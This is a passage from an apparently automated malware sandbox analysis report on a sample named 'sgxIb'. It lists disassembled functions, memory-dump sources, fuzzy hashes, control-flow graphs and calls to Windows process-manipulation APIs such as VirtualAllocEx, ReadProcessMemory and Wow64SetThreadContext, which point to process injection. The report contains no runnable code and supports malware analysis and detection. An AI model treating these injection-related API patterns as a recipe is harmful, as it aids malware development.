                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 8a4cef1a76aa3714ab17dce17da21632117e3d18547c31be250082c5ad26ebb2
                                        • Instruction ID: 8618cad481dd6664a8f3f54b08ffe9276bfceab84cd5b24de15447d292c78c6b
                                        • Opcode Fuzzy Hash: 8a4cef1a76aa3714ab17dce17da21632117e3d18547c31be250082c5ad26ebb2
                                        • Instruction Fuzzy Hash: D12125B1D003098FDB10DFAAC4857EEBBF4AB88324F14842AD459A7241DB789985CBA5
                                        Function 066D1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066D14D8
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: ef229f37139bbec50bc8d728b105aaef84c104a37e37eb652ee11d314770d2b9
                                        • Instruction ID: 2083b3867ce5aab76ffd5018fdd7b904dc33b588c110af399f139f8adc923445
                                        • Opcode Fuzzy Hash: ef229f37139bbec50bc8d728b105aaef84c104a37e37eb652ee11d314770d2b9
                                        • Instruction Fuzzy Hash: 192139B1D003599FCB10DFAAC880ADEFBF5FF48314F108429E559A7250C778A544CBA4
                                        Function 066D0960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066D09DE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 36af678df97474b5fdb6177badc8911bce11159937856a1d0fb0ecd23bf716f4
                                        • Instruction ID: c3f0928d5bbe8e4ed4fbd50d32bdd1137e706acfcfe7b0b5c37259d0579df826
                                        • Opcode Fuzzy Hash: 36af678df97474b5fdb6177badc8911bce11159937856a1d0fb0ecd23bf716f4
                                        • Instruction Fuzzy Hash: 6F2107B1D003098FDB50DFAAC4857EEBBF4AB88324F148429D459A7241DB78A985CFA5
                                        Function 00B0DA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0DACF
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 91ba88b62a6e49315df9e61e6e0cda3ff68d529758e019b4c7807c7c92a78a63
                                        • Instruction ID: e46cfe50332960d5ba1ba409e1d08c9c7c31f07ecc33ee0d71de2acb44744a11
                                        • Opcode Fuzzy Hash: 91ba88b62a6e49315df9e61e6e0cda3ff68d529758e019b4c7807c7c92a78a63
                                        • Instruction Fuzzy Hash: 0E21E4B59002489FDB10CF9AD584ADEFFF4EB48310F14841AE914A3350D374A940CFA4
                                        Function 066D12A6 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D1316
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 03191c5cf0e315363fa66a1e4529196fc1c8ebbe8ba2aaa89eb7f88fb78d15ca
                                        • Instruction ID: 0bfa40cb7fc9a96b7660fdb7729499f728bbe37e5957b9988893401e204e82e1
                                        • Opcode Fuzzy Hash: 03191c5cf0e315363fa66a1e4529196fc1c8ebbe8ba2aaa89eb7f88fb78d15ca
                                        • Instruction Fuzzy Hash: B81137719002499FCB10DFAAC845BDEFFF5EF88324F108429E559A7250C7759945CFA4
                                        Function 066D12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D1316
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 01af7966a9ad65c00e0206eaa66642cbcbde6a5a0f47aa2f3c09ee0c92f0fff9
                                        • Instruction ID: e2d14ed7ade029a0432e0034af3d7061d9b7585778c64a3e0df3ee9b31c46f51
                                        • Opcode Fuzzy Hash: 01af7966a9ad65c00e0206eaa66642cbcbde6a5a0f47aa2f3c09ee0c92f0fff9
                                        • Instruction Fuzzy Hash: 801137719002499FCB10DFAAC844BDEFFF5EF88324F108419E559A7250C775A944CFA4
                                        Function 066D08AB Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: e8336868ed87203dd108c761ed70316f7b11256efc0e059b473411ef91d59aad
                                        • Instruction ID: 80780187dcf2a5499cba04be66ddc65b8e60fb018dafc9efea68f090af311ef3
                                        • Opcode Fuzzy Hash: e8336868ed87203dd108c761ed70316f7b11256efc0e059b473411ef91d59aad
                                        • Instruction Fuzzy Hash: C6116AB1D002488FDB20DFAAC4457DFFBF4EB88324F208429D459A7240C738A945CFA4
                                        Function 066D4FE8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 84914feb3920d09688e8c006facf1851dd4bc5316bb6d40579b1440ee717f839
                                        • Instruction ID: d7c1df8a9ff240d42a079bc991cc31833d7e8e7d435d6b11951381f3fa823e98
                                        • Opcode Fuzzy Hash: 84914feb3920d09688e8c006facf1851dd4bc5316bb6d40579b1440ee717f839
                                        • Instruction Fuzzy Hash: BB1122B58003489FCB10DF9AC884BDEFBF8EB48324F208419E419A7600C375AA84CFE0
                                        Function 066D08B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: fc64ebfde10d740772554da8cf5c6237939d470c638fea6420401c847210864c
                                        • Instruction ID: af3812b8f61d3396e932c29637a533750f42d3a38262f5f370fc698fe82c5e18
                                        • Opcode Fuzzy Hash: fc64ebfde10d740772554da8cf5c6237939d470c638fea6420401c847210864c
                                        • Instruction Fuzzy Hash: 3F1136B1D003498FDB20DFAAC4457EEFBF5EB88324F208429D459A7250CB79A944CFA5
                                        Function 00B0B358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B3BE
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900405557.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_b00000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 767c47a9d6ec5103dda248aebb7cd0a680ca52017b7da93ce953d8a22138760b
                                        • Instruction ID: f89029439b8e511b359d411d70e5f92388395eff39b990002db1dff30c8f51af
                                        • Opcode Fuzzy Hash: 767c47a9d6ec5103dda248aebb7cd0a680ca52017b7da93ce953d8a22138760b
                                        • Instruction Fuzzy Hash: 5A111DB6D003498FCB10CF9AD444ADEFBF4EF88324F20846AD829A7650C379A545CFA5
                                        Function 066D3264 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 066D504D
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1905183911.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_66d0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 82f1da9519ecfdab7dc6dadc6196054690192b6a9fd73c697e7aeeb4e9e863d8
                                        • Instruction ID: 985d5ca148c7f94010e51167c57d18872db344e8a2d4bbede063701c2f2e47c6
                                        • Opcode Fuzzy Hash: 82f1da9519ecfdab7dc6dadc6196054690192b6a9fd73c697e7aeeb4e9e863d8
                                        • Instruction Fuzzy Hash: 8B1122B58003499FCB10DF8AD888BDEFBF8EB48324F10841AE519A7600C375A984CFE0
                                        Function 008FD3D8 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6dcbf7e2f617dbe0f21c44888504c7a367e02c53d0358a131398d123a8c88ce
                                        • Instruction ID: 81d38c3f18896c808748cd0f65849dd7ce79ca2ae874fb1728d3e92541ca035e
                                        • Opcode Fuzzy Hash: a6dcbf7e2f617dbe0f21c44888504c7a367e02c53d0358a131398d123a8c88ce
                                        • Instruction Fuzzy Hash: 74212871500308DFDB05DF24D9C4B26BF66FBA4314F20C169DB098B256C33AE856C6A2
                                        Function 0090D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900066194.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_90d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f8bbd3dcd5483465b1576fd71d509527e041848ed3490e3bb5ab18fd93f0e90
                                        • Instruction ID: 2f4e5f8aabfe0e179bdef820aca091c914aa3523fa8a972e55983fd34740c202
                                        • Opcode Fuzzy Hash: 2f8bbd3dcd5483465b1576fd71d509527e041848ed3490e3bb5ab18fd93f0e90
                                        • Instruction Fuzzy Hash: C121F271604200DFDB14DF54D984B26BBB9EB84314F20C969D84E4B296C33AD847CA61
                                        Function 008FD3D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction ID: 3d9f1fd82f135ad6a210ebbcd9074f035414b35025027bde1b7d40cefd290d3d
                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction Fuzzy Hash: CC11E472404344CFCB01CF10D5C4B26BF72FBA4314F24C2A9DA094B656C33AD456CBA1
                                        Function 0090D017 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1900066194.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_90d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction ID: a67ce7e774ca72e6cbf9bf8d38ebb9c5baeb5c4ce108db3b91c597253b5d2226
                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                        • Instruction Fuzzy Hash: B6118B75504280DFDB15CF54D5C4B16BBB2FB84314F24C6AAD8494B696C33AD84ACBA2
                                        Function 008FD731 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 697c830f6dca68c2ad48996e31a6bc968c5db25e11a3896d37b890cd46b3b284
                                        • Instruction ID: b75fa6550b8b56350bb31a40983991f48ed06785089873d6d6b7e661c105c272
                                        • Opcode Fuzzy Hash: 697c830f6dca68c2ad48996e31a6bc968c5db25e11a3896d37b890cd46b3b284
                                        • Instruction Fuzzy Hash: D201A7711093489AE7106A35CDC4777FF99FF41324F28C569EF098E196D2799840C671
                                        Function 008FD730 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1899995922.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_8fd000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c053176b7c9288a964957bf457b2c9b687ca1389542e8392c81508537fe4ba70
                                        • Instruction ID: c7367ee92ecc027774da2d3e7c5380171785d13c936b7d50005c4597e8f973ab
                                        • Opcode Fuzzy Hash: c053176b7c9288a964957bf457b2c9b687ca1389542e8392c81508537fe4ba70
                                        • Instruction Fuzzy Hash: EFF06272408344AAE7109A26C9C4B66FFA9EF91734F28C55AEE085E296C2799844CA71

                                        Execution Graph

                                        Execution Coverage:14.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:17
                                        Total number of Limit Nodes:4
                                        execution_graph 26049 3020848 26051 3020849 26049->26051 26050 302091b 26051->26050 26053 3021340 26051->26053 26055 3021343 26053->26055 26054 3021454 26054->26051 26055->26054 26057 30280f9 26055->26057 26058 3028103 26057->26058 26059 30281b9 26058->26059 26062 6f1fa88 26058->26062 26066 6f1fa78 26058->26066 26059->26055 26063 6f1fa8d 26062->26063 26064 6f1fcae 26063->26064 26065 6f1fcd5 GlobalMemoryStatusEx GlobalMemoryStatusEx 26063->26065 26064->26059 26065->26063 26067 6f1fa88 26066->26067 26068 6f1fcae 26067->26068 26069 6f1fcd5 GlobalMemoryStatusEx GlobalMemoryStatusEx 26067->26069 26068->26059 26069->26067

                                        Executed Functions

                                        Function 06F13580 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 125 6f13580-6f135a1 126 6f135a3-6f135a6 125->126 127 6f13d47-6f13d4a 126->127 128 6f135ac-6f135cb 126->128 129 6f13d70-6f13d72 127->129 130 6f13d4c-6f13d6b 127->130 137 6f135e4-6f135ee 128->137 138 6f135cd-6f135d0 128->138 131 6f13d74 129->131 132 6f13d79-6f13d7c 129->132 130->129 131->132 132->126 135 6f13d82-6f13d8b 132->135 143 6f135f4-6f13603 137->143 138->137 140 6f135d2-6f135e2 138->140 140->143 254 6f13605 call 6f13da0 143->254 255 6f13605 call 6f13d99 143->255 144 6f1360a-6f1360f 145 6f13611-6f13617 144->145 146 6f1361c-6f138f9 144->146 145->135 167 6f13d39-6f13d46 146->167 168 6f138ff-6f139ae 146->168 177 6f139b0-6f139d5 168->177 178 6f139d7 168->178 180 6f139e0-6f139f3 call 6f1316c 177->180 178->180 183 6f13d20-6f13d2c 180->183 184 6f139f9-6f13a11 call 6f13178 180->184 183->168 185 6f13d32 183->185 187 6f13a16-6f13a1b 184->187 185->167 187->183 188 6f13a21-6f13a2b 187->188 188->183 189 6f13a31-6f13a3c 188->189 189->183 190 6f13a42-6f13b18 189->190 202 6f13b26-6f13b56 190->202 203 6f13b1a-6f13b1c 190->203 207 6f13b64-6f13b70 202->207 208 6f13b58-6f13b5a 202->208 203->202 209 6f13bd0-6f13bd4 207->209 210 6f13b72-6f13b76 207->210 208->207 211 6f13d11-6f13d1a 209->211 212 6f13bda-6f13c16 209->212 210->209 213 6f13b78-6f13ba2 210->213 211->183 211->190 225 6f13c24-6f13c32 212->225 226 6f13c18-6f13c1a 212->226 220 6f13bb0-6f13bcd call 6f13184 213->220 221 6f13ba4-6f13ba6 213->221 220->209 221->220 228 6f13c34-6f13c3f 225->228 229 6f13c49-6f13c54 225->229 226->225 228->229 232 6f13c41 228->232 233 6f13c56-6f13c5c 229->233 234 6f13c6c-6f13c7d 229->234 232->229 235 6f13c60-6f13c62 233->235 236 6f13c5e 233->236 238 6f13c95-6f13ca1 234->238 239 6f13c7f-6f13c85 234->239 235->234 236->234 243 6f13ca3-6f13ca9 238->243 244 6f13cb9-6f13d0a 238->244 240 6f13c87 239->240 241 6f13c89-6f13c8b 239->241 240->238 241->238 245 6f13cab 243->245 246 6f13cad-6f13caf 243->246 244->211 245->244 246->244 254->144 255->144
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 63cd287647a087a48b4fa74859ded6ef90a92933fe2cf5549929797f8c352583
                                        • Instruction ID: 46b3f1ca4c8d24d81504996c9201ad723ea5e86a81de7271ffb63f5f4a5bd3fb
                                        • Opcode Fuzzy Hash: 63cd287647a087a48b4fa74859ded6ef90a92933fe2cf5549929797f8c352583
                                        • Instruction Fuzzy Hash: CE320D31E1071ACFCB54EF79D89459DB7B6FF89300F10C6A9D409AB264EB30A985CB81
                                        Function 06F10040 Relevance: 2.0, Instructions: 1977COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e46b1ad34af453dd6243d27d46564a2b06487575262bd442db4ab4091b684a16
                                        • Instruction ID: 4845eecbc6ac2bec36db6e00d7a5342e6895a6474988ca5974f8c29546784081
                                        • Opcode Fuzzy Hash: e46b1ad34af453dd6243d27d46564a2b06487575262bd442db4ab4091b684a16
                                        • Instruction Fuzzy Hash: 0423EA31D10B198ECB15EB68C8905ADF7B1FF99300F15D79AE458BB221EB70AAC5CB41
                                        Function 06F10006 Relevance: 2.0, Instructions: 1977COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11c653aa963508afa4a38e005a3f3c9c1eaec671d5ae431cf4706cf44329750a
                                        • Instruction ID: c5a3705d2affb91e2c95b21a6c21d03ebf1ef636f7aec9be3156f67ee2b80798
                                        • Opcode Fuzzy Hash: 11c653aa963508afa4a38e005a3f3c9c1eaec671d5ae431cf4706cf44329750a
                                        • Instruction Fuzzy Hash: E823E931D10B198ECB15EB68C8905ADF7B1FF99300F15D79AE458BB221EB70AAC5CB41
                                        Function 06F1ADE8 Relevance: 10.4, Strings: 8, Instructions: 392COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 6f1ade8-6f1ae06 1 6f1ae08-6f1ae0b 0->1 2 6f1ae0d-6f1ae29 1->2 3 6f1ae2e-6f1ae31 1->3 2->3 4 6f1b005-6f1b00e 3->4 5 6f1ae37-6f1ae3a 3->5 6 6f1ae91-6f1ae9a 4->6 7 6f1b014-6f1b01e 4->7 9 6f1ae3c-6f1ae49 5->9 10 6f1ae4e-6f1ae51 5->10 11 6f1aea0-6f1aea4 6->11 12 6f1b01f-6f1b056 6->12 9->10 13 6f1ae53-6f1ae57 10->13 14 6f1ae62-6f1ae65 10->14 18 6f1aea9-6f1aeac 11->18 26 6f1b058-6f1b05b 12->26 13->7 20 6f1ae5d 13->20 15 6f1ae67-6f1ae6c 14->15 16 6f1ae6f-6f1ae72 14->16 15->16 21 6f1ae74-6f1ae87 16->21 22 6f1ae8c-6f1ae8f 16->22 24 6f1aebc-6f1aebe 18->24 25 6f1aeae-6f1aeb7 18->25 20->14 21->22 22->6 22->18 27 6f1aec0 24->27 28 6f1aec5-6f1aec8 24->28 25->24 29 6f1b05d-6f1b079 26->29 30 6f1b07e-6f1b081 26->30 27->28 28->1 32 6f1aece-6f1aef2 28->32 29->30 33 6f1b090-6f1b093 30->33 34 6f1b083 call 6f1b3e7 30->34 47 6f1b002 32->47 48 6f1aef8-6f1af07 32->48 37 6f1b0a0-6f1b0a3 33->37 38 6f1b095-6f1b099 33->38 41 6f1b089-6f1b08b 34->41 39 6f1b0a9-6f1b0e4 37->39 40 6f1b30c-6f1b30f 37->40 38->39 42 6f1b09b 38->42 52 6f1b2d7-6f1b2ea 39->52 53 6f1b0ea-6f1b0f6 39->53 44 6f1b311-6f1b31b 40->44 45 6f1b31c-6f1b31e 40->45 41->33 42->37 50 6f1b320 45->50 51 6f1b325-6f1b328 45->51 47->4 57 6f1af09-6f1af0f 48->57 58 6f1af1f-6f1af5a call 6f166b8 48->58 50->51 51->26 54 6f1b32e-6f1b338 51->54 56 6f1b2ec 52->56 62 6f1b116-6f1b15a 53->62 63 6f1b0f8-6f1b111 53->63 64 6f1b2ed 56->64 60 6f1af11 57->60 61 6f1af13-6f1af15 57->61 76 6f1af72-6f1af89 58->76 77 6f1af5c-6f1af62 58->77 60->58 61->58 78 6f1b176-6f1b1b5 62->78 79 6f1b15c-6f1b16e 62->79 63->56 64->64 90 6f1afa1-6f1afb2 76->90 91 6f1af8b-6f1af91 76->91 80 6f1af64 77->80 81 6f1af66-6f1af68 77->81 85 6f1b1bb-6f1b296 call 6f166b8 78->85 86 6f1b29c-6f1b2b1 78->86 79->78 80->76 81->76 85->86 86->52 97 6f1afb4-6f1afba 90->97 98 6f1afca-6f1affb 90->98 93 6f1af93 91->93 94 6f1af95-6f1af97 91->94 93->90 94->90 100 6f1afbc 97->100 101 6f1afbe-6f1afc0 97->101 98->47 100->98 101->98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: 76d8b1ff3c82f0a6ed00949840d73bafe3a921b6a1b10a298ee60a16348357b7
                                        • Instruction ID: 9949f73b68d4ffae17a31c91a8a65c7f6201b619682bb66f1889be47cebeeb0e
                                        • Opcode Fuzzy Hash: 76d8b1ff3c82f0a6ed00949840d73bafe3a921b6a1b10a298ee60a16348357b7
                                        • Instruction Fuzzy Hash: 64E16B30E0130ACFDB69DF69D5946AEB7B2FB84340F108529D419AF354DB35DC868B81
                                        Function 06F19268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 256 6f19268-6f1928d 257 6f1928f-6f19292 256->257 258 6f19294-6f192b3 257->258 259 6f192b8-6f192bb 257->259 258->259 260 6f192c1-6f192d6 259->260 261 6f19b7b-6f19b7d 259->261 268 6f192d8-6f192de 260->268 269 6f192ee-6f19304 260->269 263 6f19b84-6f19b87 261->263 264 6f19b7f 261->264 263->257 266 6f19b8d-6f19b97 263->266 264->263 270 6f192e0 268->270 271 6f192e2-6f192e4 268->271 273 6f1930f-6f19311 269->273 270->269 271->269 274 6f19313-6f19319 273->274 275 6f19329-6f1939a 273->275 276 6f1931b 274->276 277 6f1931d-6f1931f 274->277 286 6f193c6-6f193e2 275->286 287 6f1939c-6f193bf 275->287 276->275 277->275 292 6f193e4-6f19407 286->292 293 6f1940e-6f19429 286->293 287->286 292->293 298 6f19454-6f1946f 293->298 299 6f1942b-6f1944d 293->299 304 6f19471-6f19493 298->304 305 6f1949a-6f194a4 298->305 299->298 304->305 306 6f194b4-6f1952e 305->306 307 6f194a6-6f194af 305->307 313 6f19530-6f1954e 306->313 314 6f1957b-6f19590 306->314 307->266 318 6f19550-6f1955f 313->318 319 6f1956a-6f19579 313->319 314->261 318->319 319->313 319->314
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: c0275a9f343bc58315396f4e6bd9198bf2a43f19543b654446d2b2272e88adc5
                                        • Instruction ID: d58490889236255b99ca247dca6e5aa75ab428ea0a7935027b37aa697ffca3f8
                                        • Opcode Fuzzy Hash: c0275a9f343bc58315396f4e6bd9198bf2a43f19543b654446d2b2272e88adc5
                                        • Instruction Fuzzy Hash: 0F914E30F0020A9FDB54DB69D9607AEB3F6EBC9244F108569C409EB394EB74DD868F91
                                        Function 06F1D070 Relevance: 4.6, Strings: 3, Instructions: 802COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
